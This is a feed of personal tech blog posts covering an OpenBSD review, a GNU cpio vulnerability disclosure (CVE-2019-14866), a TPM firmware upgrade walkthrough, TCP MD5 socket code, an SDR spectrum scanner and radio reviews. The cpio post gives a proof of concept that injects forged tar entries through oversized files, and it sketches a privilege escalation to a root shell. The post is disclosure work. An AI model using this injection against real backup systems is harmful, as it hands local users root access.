Quantcast
Channel: Blargh
Viewing all 112 articles
Browse latest View live

OpenBSD in 2019

$
0
0

I’ve used OpenBSD on and off since 2.1. More back then than in the last 10 years or so though, so I thought I’d try it again.

What triggered this was me finding a silly bug in GNU cpio that has existed with a “FIXME” comment since at least 1994. I checked OpenBSD to see if it had a related bug, but as expected no it was just fine.

I don’t quite remember why I stopped using OpenBSD for servers, but I do remember filesystem corruption on “unexpected power disconnections” (even with softdep turned on), which I’ve never really seen on Linux.

That and that fewer things “just worked” than with Linux, which matters more when I installed more random things than I do now. I’ve become a lot more minimalist. Probably due to less spare time. Life is better when you don’t run things like PHP (not that OpenBSD doesn’t support PHP, just an example) or your own email server with various antispam tooling, and other things.

This is all experience from running OpenBSD on a server. On my next laptop I intend to try running OpenBSD on the dektop, and will see if that more ad-hoc environment works well. E.g. will gnuradio work? Lack of other-OS VM support may be a problem.

How to run OpenBSD in 2019

The easiest way to run servers nowadays is to just rent VMs on public clouds. Unfortunately most clouds don’t support OpenBSD. Vultr does, and they’re pretty good. They have IPv6-only VMs (US locations only) that are only $2.50/month ($3.50/month with IPv4). They also, unlike some other cloud vendors, give access to the actual console, which is very helpful.

I installed OpenBSD 6.5 (the newest, at the time), and tried it out.

The good

  • Security mindset. Should go without saying, but it’s a perfectly usable Unix system that places security first. They may not be first (e.g. took them years to reinvent W^X behind Linux), but they were the first to turn on the features by default, and you can trust them to continue to do so. E.g. who else bothers to link a unique kernel per system?

  • Ports and packages end up in /usr/local, and anything outside that either you put there, or it’s the base system. Sure, it means /usr/local may be a bit of a mess, but outside of it isn’t.

  • It’s clear what base system you’re running. Kernel and everything is plainly “6.6” (or whatever). Well… plus any syspatch fixes.

  • Upgrading the system to OpenBSD 6.6 was easy. I had my fears, but it was about as easy as installing.

  • The init system has gotten start/stop scripts, in /etc/rc.d. From what I remember /etc/rc used to be one big start script, with no good way to restart services without remembering what took a HUP, what wanted its own tool, etc…

  • Most things just worked. My Go code worked fine. Well, except for an annoying bug in Go’s sys/unix and syscall libraries, that (like the GNU cpio bug) is not a great sign of quality.

  • Modern enough clang to support C++17. The GCC version is stuck in the stone age because of licensing, but clang is a worthy replacement now. Development should be good here.

  • Since I’d fixed some MPLS code a long time ago I read through the MPLS forwarding code. Like when I checked OpenBSD’s cpio code I found it of very high quality, with APIs designed such that it’s hard to use them incorrectly, or to leak resources.

  • I generally find the OpenBSD manpages to be of higher quality than GNU ones. Also nice to have man section 9 (kernel internals) installed by default.

The bad

It’s less smooth to use. It lacks many convenience options in tools. Some examples:

  • The easy path to upgrading seems to require console access, and taking the server out of commission for a while while doing it. Compare this with Debian where I’ve run servers for 10 years, confidently upgrading the whole OS remotely the whole time and without access to console.

  • Upgrading also has a bunch of manual cleanup steps.

  • I can reliably crash it by using too much RAM. Completely freezes it, even the console and not answering ping. I don’t know if this is OpenBSD’s fault, or a result of it being in a VM, or something on Vultr’s side. Adding some more swap helped, but that just delays the problem.

  • There’s no default package repo path, so you have to choose a mirror yourself and set PKG_PATH. And since I’m on an IPv6-only VM I had to check a few before finding one that had an IPv6 address.

  • find requires a path argument. I don’t see why it can’t default to ..

  • du doesn’t take a -m switch. Workaround is BLOCKSIZE=1000000 du -cs * which is not as friendly.

  • which brings me to: if the correction to SI units was lacking in Linux it’s completely absent in OpenBSD. I’m guessing they’ve chosen not to.

  • OpenBSD’s tar can’t read /etc/spwd.db due to security features, which is great and all, but prevents backing up /etc and being able to check exit code for success of everything else. It also doesn’t support exclusion or inclusion lists. I would have changed my portable backupscripts to cpio, but because GNU cpio has the bug mentioned earlier I can’t. OpenBSD’s default shell (ksh) has support for glob exclusions, as does bash. But it’s not a great solution (cmdline length for one, and this could be its own blog post so I’ll stop here). Luckily you can install GNU tar as a package and use that.

  • TCP MD5 seems to be implemented as system-wide settings. It’s understandable but I don’t like it. More on that here.

  • After upgrading to OpenBSD 6.6 random shellscripts started failing. Turns out /bin/shcould’t handle large HISTSIZE that I had set for bash, and it just aborts the shell if set too high, instead of making do with less history. The developers were very responsive and it’s been fixed now, but still needs to be improved a bit further, as they pointed out.

  • While the manpages are good, the source code is not very well commented. I agree that good code doesn’t need “what does it do”, but it does need “why”. Specifically what I found missing were:
    • What is an “environment” in ksh? What is its purpose?
    • Why is ksh using its own allocator?
  • I found a bug in the first part of the kernel I looked at. Not a serious one, but still.

  • acme-client (at least in 6.5) doesn’t work with IPv6-only machines. I fixed the first step by replacing a PF_UNSPEC with PF_INET6, but then the next step failed so I switched to certbot.

  • There are some Linux-only things. Pov-Ray 3.7, in addition to since 3.6 switching to the terrible AGPL, switched to build scripts that only work on Linux. This sucks for my distributed render project.

  • Postgresql was a bit awkward to set up, since the unix user is _postgresql, but the postgres user is postgres. Adding export PGUSER=postgres to ~_postgresql/.profile seemed like the best fix.

  • The equivalent to strace, ktrace/kdump, is a two-step process, and does not produce as good output.

  • No checksumming filesystem in sight.

  • Less binary compatability. Linux is strict on not breaking userspace, but OpenBSD seems less so. Seems the old dnetc binaries don’t work on a modern OpenBSD system, for example.

  • The general OpenBSD attitude. Read the last paragraph of this FAQ and tell me you feel like this is a system and people that care about your use cases. It really says that this is their OS, and if you happen to be able to run it then good for you.

Verdict

Ouch, that’s a long list of bad stuff. Still, I like it. I’ll continue to run it, and will make sure my stuff continues working on OpenBSD.

And maybe in a year I’ll have a review of OpenBSD on a laptop.


CVE 2019-14866: GNU cpio

$
0
0

I found a security bug in GNU cpio and thought I’d write down the story of that. It’s not the most interesting bug in the world, but it may still be an interesting story to some.

An odd limit

The whole thing started with me looking at the manpage

-H, --format=FORMAT
  Use given archive FORMAT. Valid formats are (the number in
  parentheses gives maximum size for individual archive member):
  bin    The obsolete binary format. (2147483647 bytes)
  odc    The old (POSIX.1) portable format. (8589934591 bytes)
  newc   The new (SVR4) portable format, which supports file
         systems having more than 65536 i-nodes. (4294967295 bytes)
  crc    The new (SVR4) portable format with a checksum added.
  tar    The old tar format. (8589934591 bytes)
  ustar  The POSIX.1 tar format. Also recognizes GNU tar archives, which are
         similar but not identical. (8589934591 bytes)
  hpbin  The obsolete binary format used by HPUX's cpio (which stores device
         files differently).
  hpodc  The portable format used by HPUX's cpio (which stores device files
         differently).

What’s wrong with this picture? Those are some very odd size limits. 2GiB and 4GiB I understand, as it’s 32bit signed and unsigned int. But tar having a max size of 8GiB? 33 bits? That doesn’t make any sense.

I was lucky finding this because some versions of the manpage doesn’t have this info. E.g. this and this.

Turns out the tar header format stores file size in 12 bytes, as a stringin octal! There are variants and extensions, but long story short that’s the common limit.

That’s… terrible. But it’s a format from the stone age, so maybe can be forgiven.

I wonder what happens if you exceed that limit… oh… oh no

$ dd if=/dev/zero seek=16G bs=1 count=0 of=testfile.dat
$ echo testfile.dat | cpio -H tar -o | tar tf -
-rw-r--r-- 1000/1000         0 2019-11-07 13:04 testfile.dat
                          ^^^^\--- That's the size according to tar.
$ echo testfile.dat | cpio -H tar -o | wc -c
                          17179870720
                          ^^^^^^^^^^^\-- That's the total size of the file.

oh no. The tar format is a series of “hey, here comes a file named X, that’s Y bytes long, after those Y bytes I’ll tell you about the next file”.

I’ve generated a tar file that says “hey, here comes a file named testfile.dat that’s 0 bytes long. After those 0 bytes comes another file header.”

This means I can make cpio read data (contents of file it reads), and write it as if it’s metadata (a tar header):

$ tar cf suffix.tar AUTHORS                            # Create some payload.
$ dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar  # Pad it to "look like" 0 bytes.
$ echo suffix.tar | cpio -H tar -o | tar tvf -         # Feed it to cpio.
    -rw-r--r-- 1000/1000       0 2019-08-30 16:40 suffix.tar
    -rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS

The point here is that cpio was fed one file (suffix.tar) to put into the tar file, but it put two files in there. cpio never read AUTHORS, and it should not be listed.

But so what?

The above is obviously wrong, but how is it a security issue?

It’s a security issue because it’s not just the contents of the injected files that can have arbitrary content, but also the type of file, owner, and suid bits.

I could prepare a payload tar file that contains a suid root shell, and a /dev/sda block device.

evil$ # 1) Prep payload
evil$ ./generate_evil_data --out /home/evil/foo.tar

root# # 2) root user performs backup
root# find /home -print0 | cpio -0 -H tar -o > /var/backup/h.tar

root# # 3) root user restores
root# cd /
root# tar xf /var/backup/h.tar /home/evil/

evil$ # 4) evil user uses newly created rootshell, or writes to /dev/sda
evil$ ls -l /home/evil/
srwxr-xr-x 1 evil evil 61176 Aug  3  2018 /home/evil/rootshell
brw-rw---- 1 evil evil 8, 0 Oct  7 11:21 /home/evil/sda-pwned
evil$ /home/evil/rootshell
# id
uid=0(root) gid=0(root) groups=0(root)

Finding the code culprit

static void    // [no error checking]
to_oct(long value, […])
{
  [… write as many octal bits as possible, not checking if `value` didn't fit …]
}
[…]
void           // [no error checking]
write_out_tar_header (struct cpio_file_stat *file_hdr, int out_des)
[…]
write_out_header([…])
[…]
write_out_tar_header (file_hdr, out_des); /* FIXME: No error checking */
return 0;    // [0 means success]

That “FIXME” is in the original, and appears to have been there since at least 1994.

There may be millions of scripts out there using cpio that are vulnerable.

The tar format is largely to blame here. It’s a “packet in packet” attack which could have been prevented if tar, like many many other formats and protocols, used a regular language (also see this talk).

Well the tar format and a code bug from like 1994.

So is this only GNU, or more implementations?

OpenBSD, as usual, is fine.

Reporting

I reported to the bug-cpio mailing list, being a bit vague describing it only as “hey, that’s surprising output”, hoping to get the patch in early.

10 days with no reply later I emailed the Debian package maintainer and cpio owner directly. No response.

Another week later I started emailing security@debian.org and secalert@redhat.com. Redhat took 10 days to respond. Debian 13 days.

It took a bit of back and forth to explain why this was a security issue, but RedHat eventually created CVE 2019-14866.

On 2019-10-25 the cpio maintainer creates creates a separate patch for the problem. It’s multiple changes in one, which is not great, so for backporting the change to Debian old and oldold stable the Debian package maintainer chose to go with my minimal patch (with a 32bit arch fix).

  • Ubuntu (calls this expose of info, but it’s privesc).
  • Debian
  • Redhat

Librem13v2 TPM upgrade

$
0
0

I have upgraded my TPM firmware on my Librem13v2. Its keys are now safe. \o/

Back in 2017 we had the Infineon disaster (aka ROCA). I’ve written about it before about how bad it is and how to check if you’re affected with a simple tool.

I TAKE NO RESPONSIBILITY IF YOU BRICK YOUR DEVICE OR FOR ANYTHING ELSE BAD HAPPENING FROM YOU FOLLOWING MY NOTES.

Before the upgrade

$ tpm_version | grep Chip
Chip Version:        1.2.4.40    <--- Example vulnerable version
$ cbmem -c | grep Purism         # I upgraded coreboot/SeaBIOS just before doing this.
coreboot-4.9-10-g123a4c6101-4.9-Purism-2 Wed Nov 13 19:54:43 UTC 2019 […]
[…]
Found mainboard Purism Librem 13 v2

Download upgrade tool

$ wget https://repo.pureos.net/pureos/pool/main/t/tpmfactoryupd/tpmfactoryupd_1.1.2459.0-0pureos9_amd64.deb
[…]
$ alien -t tpmfactoryupd_1.1.2459.0-0pureos9_amd64.deb
[…]
$ tar xfz tpmfactoryupd-1.1.2459.0.tgz
$ mv usr/bin/TPMFactoryUpd .
$ sudo systemctl stop trousers.service         # Need to turn off tcsd for TPMFactoryUpd to work in its default mode.
[…]
$ ./TPMFactorUpd -info
  **********************************************************************
  *    Infineon Technologies AG   TPMFactoryUpd   Ver 01.01.2459.00    *
  **********************************************************************

       TPM information:
       ----------------
       Firmware valid                    :    Yes
       TPM family                        :    1.2
       TPM firmware version              :    4.40.119.0
       TPM enabled                       :    Yes
       TPM activated                     :    Yes
       TPM owner set                     :    Yes
       TPM deferred physical presence    :    No (Not settable)
       Remaining updates                 :    64

Note the status of the TPM: enabled, active, owner set, and not “physical presence”. This is not the state we want to be in for our upgrade.

Get TPM into state ready to upgrade.

The TPM must be enabled and active. If it’s not then you need to get into your BIOS to fix that. You may need to enter from a clean power off. A “reboot” may not be enough.

Then are two TPM chip states where an upgrade will work:

  1. Deferred physical presence is set to “yes”. You may be able to get into this state on some machines by using tpm_clear, and then rebooting. Your BIOS will then ask you “do you confirm TPM physical presence?”. I believe one of my other machines did this, but it’s been too long for me to be sure. It looks like this is not possible with the Librem13v2, so I won’t talk about this option any further.
  2. The “Owner” must be cleared.

To clear the TPM I did:

  1. tpm_clear
  2. Reboot
  3. When the Purism screen shows, press ESC
  4. Press t to enter the TPM menu
  5. Choose c to clear the TPM
  6. Choose e to enable the TPM
  7. Choose a to activate the TPM. The machine automatically reboots
  8. At the grub menu, press e on your normal boot option
  9. Go to the end of the kernel line and add iomem=relaxed at the end
  10. Press F10 to boot
  11. Confirm TPM state is enabled, activated, owner NOT set: ``` $ ./TPMFactorUpd -info ************************
    • Infineon Technologies AG TPMFactoryUpd Ver 01.01.2459.00 * ************************

    TPM information: —————- Firmware valid : Yes TPM family : 1.2 TPM firmware version : 4.40.119.0 TPM enabled : Yes <— correct TPM activated : Yes <— correct TPM owner set : No <— correct TPM deferred physical presence : No (Not settable) Remaining updates : 64 ```

Upgrade

  1. Download and unzip the firmware.
  2. Upgrade the TPM ``` $ sudo ./TPMFactoryUpd -update tpm12-takeownership -firmware TPM12_4.40.119.0_to_TPM12_4.43.257.0.BIN ************************
    • Infineon Technologies AG TPMFactoryUpd Ver 01.01.2459.00 * ************************
    TPM update information:
    -----------------------
    Firmware valid                    :    Yes
    TPM family                        :    1.2
    TPM enabled                       :    Yes
    TPM activated                     :    Yes
    TPM owner set                     :    No
    TPM deferred physical presence    :    No (Not settable)
    TPM firmware version              :    4.40.119.0
    Remaining updates                 :    64
    New firmware valid for TPM        :    Yes
    TPM family after update           :    1.2
    TPM firmware version after update :    4.43.257.0
    
    Preparation steps:
    TPM1.2 Ownership preparation was successful.
    

    DO NOT TURN OFF OR SHUT DOWN THE SYSTEM DURING THE UPDATE PROCESS!

    Updating the TPM firmware ...
    Completion: 100 %
    TPM Firmware Update completed successfully. ```
    
  3. Confirm upgrade ``` $ ./TPMFactorUpd -info ************************
    • Infineon Technologies AG TPMFactoryUpd Ver 01.01.2459.00 * ************************
    TPM information:
    ----------------
    Firmware valid                    :    Yes
    TPM family                        :    1.2
    TPM firmware version              :    4.43.257.0
    TPM enabled                       :    Yes
    TPM activated                     :    No
    TPM owner set                     :    Yes
    TPM deferred physical presence    :    No (Settable)     <--- huh? ok
    Remaining updates                 :    63 $ tpm_version | grep Chip   Chip Version:        1.2.4.43 ```
    
  4. Reboot
  5. Press ESC, t to enter TPM menu again
  6. Enable & active the TPM, reboot.
  7. tpm_takeownership -z

Confirming generated keys are good

Using my tool mentioned here.

$ ./check-srk
Running self test…
Size: 2048
Modulus:
2357823904823904723[…]4782347892347238913
--------------
The key is fine.

Thanks

Huge thanks to MrChromebox on #purism for the help.

TCP MD5

$
0
0

TCP_MD5 (RFC 2385) is something that doesn’t come up often. There’s a couple of reasons for that, good and bad.

I used it with tlssh, but back then (2010) it was not practical due to the limitations in the API on Linux and OpenBSD.

This is an updated post, written after I discovered TCP_MD5SIG_EXT.

What it is

In short it’s a TCP option that adds an MD5-based signature to every TCP packet. It signs the source and destination IP addresses, ports, and the payload. That way the data is both authenticated and integrity protected.

When an endpoint enables TCP MD5, all unsigned packets (including SYN packets) are silently dropped. For a signed connection it’s not even possible for an eavesdropper to reset the connection, since the RST would need to be signed.

Because it’s on a TCP level instead of part of the protocol on top of TCP, it’s the only thing that can protect a TCP connection against RST attacks.

It’s used by the BGP protocol to set a password on the connection, instead of sending the password in the handshake. If the password doesn’t match the TCP connection doesn’t even establish.

But outside of BGP it’s essentially not used, which is a shame. If we could enable it for any TCP service it’d add a preshared key and if nothing else completely replace the silly port knocking. It probably couldn’t replace user passwords, but it could add a layer and greatly reduce attack surface much more than, say, a TLS certificate.

It’s MD5. Sure, MD5 still doesn’t have any preimage attack. Well, none that’s feasible anyway.

So that should be fine. And if not then there’s already TCP AO which is about the same but with other algorithms.

How to use it

For the server (on Linux)

constchar*password="hello";structtcp_md5sigsig;memset(&sig,0,sizeof(sig));memcpy(&sig.tcpm_addr,&peer_sockaddr,peer_sockaddr_len);sig.tcpm_flags=TCP_MD5SIG_FLAG_PREFIX;sig.tcpm_prefixlen=0;// Match any address.
sig.tcpm_keylen=std::min(TCP_MD5SIG_MAXKEYLEN,strlen(password));memcpy(sig.tcpm_key,password,sig.tcpm_keylen);if(setsockopt(s,IPPROTO_TCP,TCP_MD5SIG_EXT,&sig,sizeof(sig))==-1){fprintf(stderr,"Failed to setsockopt(): %s\n",strerror(errno));exit(1);}

For the client (on Linux)

constchar*password="hello";structtcp_md5sigsig;memset(&sig,0,sizeof(sig));memcpy(&sig.tcpm_addr,&peer_sockaddr,peer_sockaddr_len);sig.tcpm_keylen=std::min(TCP_MD5SIG_MAXKEYLEN,strlen(password));memcpy(sig.tcpm_key,password,sig.tcpm_keylen);if(setsockopt(s,IPPROTO_TCP,TCP_MD5SIG_EXT,&sig,sizeof(sig))==-1){fprintf(stderr,"Failed to setsockopt(): %s\n",strerror(errno));exit(1);}

On the client you can use TCP_MD5SIG instead of TCP_MD5SIG_EXT, since it won’t need to set the prefixlen.

The sad reason it’s not used: It doesn’t work through NAT

Because it signs the source and destination address and port. This is getting to be less and less of an issue as the world goes IPv6. So maybe we can see more of this in the future.

This was never really a problem for BGP, since production BGP doesn’t run through NAT.

It used to be impossible to use on Linux for most applications

The TCP_MD5SIG socket option on Linux requires specifying exactly what the remote address is. This doesn’t make sense for listening sockets, like an OpenSSH server, which won’t know ahead of time what the remote address is.

BGP doesn’t really have clients and servers, just mutually configured peers, so it works fine there.

It used to be possible (back in 2010) to enable MD5 after a connection is established. And indeed this is what I did with tlssh back in 2010. But trying that now it results in EINVAL. Which is odd, because TCP MD5 was made for routers, and routers most certainly allows enablin TCP MD5 on an existing connection.

You can actually make this work, and it’s what I did with tlssh: You enable TCP MD5 immediately after the connection is established. If the two ends don’t have the same password set, then no packets will go through in either direction, and the connections will just time out. Not the best experience.

The old TCP_MD5SIG api, generally do not use, but instead use TCP_MD5SIG_EXT, seen below:

constchar*password="hello";structtcp_md5sigsig;memset(&sig,0,sizeof(sig));memcpy(&sig.tcpm_addr,peer_sockaddr,sizeof(structsockaddr_storage));sig.tcpm_keylen=std::min(TCP_MD5SIG_MAXKEYLEN,strlen(password));memcpy(sig.tcpm_key,password,sig.tcpm_keylen);if(setsockopt(s,IPPROTO_TCP,TCP_MD5SIG,&sig,sizeof(sig))==-1){fprintf(stderr,"Failed to setsockopt(): %s\n",strerror(errno));exit(1);}

On OpenBSD it’s a system-level setting

On OpenBSD you set up the TCP MD5 as a security association between the two hosts, and then the program just enables MD5 on the socket. And it “just works” on both the client and the server. Well, a bit annoying that the key is set in hex.

# cat > /etc/tcpmd5.conf
tcpmd5 from 2001:db8::1111 to 2001:db8::2222 spi 0x100 authkey 0x68656c6c6f
tcpmd5 from 2001:db8::2222 to 2001:db8::1111 spi 0x101 authkey 0x68656c6c6f
^D
# ipsecctl -f /etc/tcpmd5.conf
constinton=1;if(setsockopt(s,IPPROTO_TCP,TCP_MD5SIG,&on,sizeof(on))==-1){fprintf(stderr,"Failed to setsockopt(): %s\n",strerror(errno));exit(1);}

Netcat with the -S option does the latter, but the password still needs to be set in the config.

So on OpenBSD it doesn’t really mesh well with adding TCP MD5 to any and all programs. Even if you set up the Security Association inside your program instead of in your config it seems more a state of the system than a state of your connection. Which makes some sense with BGP, but almost nothing else.

Patches

I’ve patched OpenSSH to enable TCP MD5. Works great. Right now it just uses a static password, but that still protects you against internet-wide spread port scans that don’t know what you’re running on port 2222.

$ sudo tcpdump -M openssh -nlpi lo port 2222
[…]
16:04:12.212566 IP6 ::1.2222 > ::1.43934: Flags [P.], seq 1828532:1828704, ack 1117, win 179, options [nop,nop,md5 valid], length 172
[…]

This sure is better than portknocking. The only problem is that it doesn’t work through IPv4 NAT. So just use IPv6.

Broadband RF scanner

$
0
0

Teaser output graph

Wifi spectrum plot

Building a broadband RF scanner

One great thing about software defined radio is that you can become less blind to the invisible world of radio waves that’s all around us. One simple thing is to do a survey of the spectrum, to see what parts are busy.

More practically you can also use this to find which Wifi channels are least busy, so that you can get optimal performance on your network. Counting the number of networks is not a good indicator, since one network may be completely unused, while another is used 24/7 to stream Netflix. And some networks are hidden anyway, making them no more secure, but more annoying.

GNU Radio has a bunch of building blocks for some interactive peeking at spectrums, but there’s still some assembly required in order to make actually useful things.

To do a survey I used a USRP B200 with a broadband spiral antenna. If you’re only interested in the Wifi spectrum then a 2.4/5GHz antenna is a better choice.

You can probably use a cheaper SDR, but you need to make sure it sends frequency tag updates in GNU Radio, so the block knows which frequency is tuned, as it moves across the spectrum.

Overall architecture

We need to read samples, measure the signal strength for a while, store it in a file, and also change frequency. Shouldn’t be too hard.

The missing pieces

Automate changing frequency

We need to evenly increase the frequency, and when it reaches the top, go back to the beginning. That’s a saw tooth signal.

Then we need to stick that value into a variable. That’s what Probe Signal block is for.

So this part we can solve entirely with standard GNU Radio blocks.

Frequency modulation flow graph

Measure strength

The only piece I needed to write was a block that takes a frequency (from stream tags) and a stream of some float vectors (signal strength), and outputs frequency and signal strength.

It’s a very simple block. With not much code. It’s written for GNU Radio 3.8 and newer, but the changes are easy to backport to 3.7 for someone so inclined. The differences should just be in the yaml file that needs to be written in XML format instead.

Here’s the full flow graph:

GNURadio flow graph for broadband scanner

Results

The results can then be plotted by GNUPlot.

set terminal png truecolor rounded size 1920,720 enhanced
set output "broadband.png"
set xtics 500
set mxtics 5
set grid mxtics
set grid xtics
set grid ytics
plot [800:6000] "broadband-scan.txt" using ($2/1e6):3 with points title "Signal"

Broadband plot of 800MHz-6GHz

Or zoomed into 2.4GHz for a wifi survey:

set terminal png truecolor rounded size 1920,720 enhanced
set output "wifi.png"
set xtics 0.01
set mxtics 10
set grid xtics
set grid ytics
set object  1 rectangle from 2.401,0 to 2.423,100 fs solid fc rgb "#ffd0d0" behind
set object  6 rectangle from 2.426,0 to 2.448,100 fs solid fc rgb "#d0ffd0" behind
set object 11 rectangle from 2.451,0 to 2.473,100 fs solid fc rgb "#d0d0ff" behind
set format x "%.2fGHz"
set label  1 center at screen 0.15,0.95, char 1 "Channel 1"  font ",14"
set label  6 center at screen 0.38,0.95, char 1 "Channel 6"  font ",14"
set label 11 center at screen 0.61,0.95, char 1 "Channel 11" font ",14"
plot [2.4:2.5] "broadband-scan.txt" using ($2/1e9):3 with dots title "Signal"

Wifi spectrum plot

Guess which wifi channel I’m using, when on 2.4GHz. :-)

Future work

This flow graph saves the timestamp of the measurements, but doesn’t use it. So this can also be used to analyze spectrum usage over time. And combined with a GPS logger this could be put on a car and plot the spectrum on a map, as well.

The antenna, and its big brother, is easily attached to a car window for such purposes.

Travelling amateur

$
0
0

Short post today. I made a tool to make it easier to know the rules when operating amateur radio overseas.

Pull requests welcome, both on the data and design/functionality.

20 years of maintaining an open source program

$
0
0

It’s been almost 10 years since my previous post about this. And 20 years since 2000-02-24, which is when arping 0.1 was released. It was a 208 line C file, with a hand made Makefile.

As of today when Arping 2.21 is overdue to be released, the code in .c and .h files (excluding tests) is 3863 lines, and it uses the amazing autotools framework for analyzing dependencies.

I’ve recently had the displeasure of working with cmake, which is just the worst. Why anyone would think cmake is even remotely acceptable I’ll never understand.

CMake sucks

But the Arping story continues. It isn’t getting many new major features. Still, since the last post there’s been 205 commits, and 10 releases.

Things like:

  • Change from gettimeofday() to clock_gettime(), when available. More info about that in this blog post.
  • Don’t check for uid=0 and stop. Capabilities can come in other ways
  • Change from poll() to select() to work around bug in MacOS X
  • Use nice and modern getifaddrs() to resolve interfaces
  • Update documentation
  • Improve error messages
  • Update author email address
  • Fix warnings and general code cleanup
  • Used coverity to find and fix suspicious code
  • Add some more stats to output
  • Print ‘Timeout’ when there’s no reply within one interval
  • Add ability to send gratuitous ARP
  • Add 802.1q VLAN support
  • Add more tests, and fuzzing
  • Drop priv user (all), capabilities (Linux), pledge()& unveil() (OpenBSD)
  • _BSD_SOURCE->_DEFAULT_SOURCE as the former is deprecated
  • Add payload data to mac ping
  • Add support for a dependency’s new way while falling back to the old way (e.g. Use pcap_create() instead of pcap_open_live())
  • Various small fixes for corner cases
  • Various small fixes to work around bugs in other libraries

For that last one it’s so that Arping won’t have strict version dependencies, and still work correctly. It’s better to have it just work, instead of bothering many people just because they haven’t (or can’t) upgrade a library.

There are many many users of Arping. If I can spend two hours working around a bug in some libpcap versions, to save 10 seconds for everyone who has such a config, then there only needs to be 720 affected people for that to have saved human effort, and life.

This is a tangent, but I wish more people would think of this fanout. If a slight perfection saves users just a few seconds, that can easily be worth a month of work. E.g. say you’re planning on sending out an email to your whole company of 20’000 people, because about half will need to do something. Let’s say it takes 10 seconds for the other half of users to see the email, click on it, and read enough to see that they don’t need to do anything. That’s 10*10000/3600=28 hours.

Do you think that if you spent less than 28 hours that you could maybe find out exactly which 10’000 people need to get this email? Can you spend another full week personalizing the email, so that it takes on average 10 seconds less to perform the needed action?

And actually, if you spend a full month on it, maybe this is something you can do without fanning out the work to 10k people?

Anyway, as can be seen from the list above even a tool that’s not changing much needs a bit of update every now and then, to still be good.

Arping 2.21 will deliver:

  • Use more modern pcap API calls, when available
  • Add payload data to mac ping
  • chdir(/) after chroot()
  • Misc minor cleanup. 23 commits in total.

Yaesu FT3D vs Kenwood D74

$
0
0

I’ve had a Kenwood TH-D74 for almost two years now, and was curious to get a sense of what the competition is like. Seems like everyone’s recommending the Yaesu FT3D. So I got one, and I think I’ve played around with it enough now to have an informed opinion.

Summarizing the feeling of them, while I have my complaints about the usability of the D74, the FT3D is like a time machine back to the 90s in how well the interface is though through.

I’m sneaking in some mentions of the AnyTone 878UV too. But I’ve not used it enough to have a solid opinion yet.

Programming

With the FT3D upgrading the firmware is a two step process, where you have to flip a little hidden switch first to “up”, to upgrade one firmware, then to “down”, to upgrade the other. And then flip it back to “middle” for normal mode.

The FT3D programming software costs $25 and comes with a special cable, but the software also seems downloadable from their website. The USB cable seems to require a special driver. I guess that’s what you’re paying for. At least you can download the software and put the data on the SD card. But even then the way you do it is to press “Save”, and browse around the SD card looking for the BACKUP file, and overwrite that.

The D74 has none of this nonsense.

The software for neither radio is great. But the FT3D is the one that had the biggest gotcha: You can cut and paste, but if you cut more than one channel, and paste it somewhere else, then by default only the first channel is pasted. The others are lost, so you’ll have to key them in again.

The most annoying bug in the D74 programming software is that if you copy-paste a channel with 12.5kHz offset into a slot that has 5kHz stepping, then it’ll round that off, pasting the wrong frequency.

Programming directly on the FT3D is frustrating. The repeater offset is in one menu (CONFIG), tone in another (SIGNALING), and both require long-pressing DISP to bring up the menu. Programming directly on the D74 is a breeze.

Strangely specific HW for features

The FT3D camera feature seems like a good idea, until you realize that (as far as I can see) it can only be used with the external mic/camera, not just any camera. I’ve also tried putting a picture on the SD card, but I’ve been unable to send it. I press the Upload option to start browsing for pictures, but it does nothing. I’m guessing it is because the picture is the wrong format, or in the wrong place, or something like that. But it doesn’t seem documented, and no error message.

The only compatible camera to FT3D being the optional mic is as silly as with the D74 where you can only take a screenshot if you buy the external mic with the take-screenshot button.

The menu system is pretty much the same quality between the FT3D and D74. In other words not great. D74 has a strange division between D-Star features and “everything else”. Almost as if two different departments implemented them, and then they just slapped them together.

The FT3D has some strange menus too. For example would you expect TX power under CONFIG or OPTION? Nope, it’s under a special menu with an on-screen button labelled “F MW”. How about GPS logging? That’s under CONFIG. Ok, makes sense. Right next to turning the GPS on and off? Nope, that one’s under APRS. At least the C4FM and FM modes are not divided into two menu systems.

Buttons

D74 wins out on efficient operation, having many more physical buttons. It’s a design choice, sure. But does the FT3D really need a dedicated Wires-X button, a band button, and G/M button? Or could one of those could have been a “menu” button so that the menu could be activated without a long press?

The FT3D side buttons are much nicer though. The D74 occasionally gets accidental PTT presses from me when I handle it clipped to my belt. I’ve not had that with the FT3D. The belt clip on the FT3D is better too. The key lock feature (also a side button) is much, much better on the FT3D. A simple click. On D74 it’s a two-button click that’s hard to do with gloves or with the protective case on.

Entering text

On the Yaesu typing a message is frustrating. Replying to a message means manually deleting the old message, because your reply is an edit what you reply to. That’s just wrong.

And selecting a letter only sometimes progresses you to the next position. Normally after pressing “abc” three times and waiting you’ll get a “c”, with the cursor moved to the next spot. But not with the FT3D. You often have to press right arrow to advance. But you can’t do that to add a space. You have to press “space”, then right arrow. But… why?

Ports & attachments

FT3D uses mini-USB instead of D74’s micro-USB. Meh. They both have advantages.

The FT3D did not work with any of my 8GB SD cards. I had to switch to a 32GB one, which is a waste.

Seems you can’t charge and operate the FT3D. Plugging in while it’s on reboots into a “running off of AC” mode. Ok, I guess that’s fine. But if you’re in that mode and turn it off again, it goes into “no battery” mode, not into charging mode. So you have to unplug and replug the charger after that.

Charging issues can be a big deal. My Elecraft KX2 battery charger lights up green if the battery is connected (no matter what state of charge the battery is in), but you forget to actually plug it into the wall. If you leave it for too long the charger will actually completely drain the battery, which is the opposite of what you wanted. If AC is not connected it then the LED should be off. I reported this to Elecraft and they replied that they agree this isn’t great, but that’s how the charger they’re selling is.

Not fun to come out to the park only to find that the battery you thought you left charging overnight is flat.

APRS

The best band to use for APRS as a second VFO is A on D74, B on Yaesu. I prefer it to be B.

D74 has built in KISS TNC. Seems much easier as you only have to connect a USB cable to send/receive packets, as opposed to connecting analog TX/RX and PTT, and set up a software TNC.

Operating APRS, in addition to typing, is much nicer with quick access to functions via the extra buttons on the D74. E.g. raising the radio high above your head and beaconing out a couple of times is easier with it.

Manual

The Yaesu manual is full of typos. Including one screenshot that shows their own trademark, WIRES-X, as “WIRSE-X”.

It’s not as bad in this regard as the AnyTone 878UV manual, which in addition to typos also has the problem of being extremely minimal in what it covers.

Sound quality

After having listened a bunch to D-Star on D74, DMR on AnyTone 878, and C4FM on the FT3D, I think they’re about the same. D-Star seems to be more dependent on the implementation, where some people sound like robots and others sound great. I’ll make a separate blog post on the different digital systems at some point.

I know some people complain about the lack of volume from the FT3D, but it’s fine.

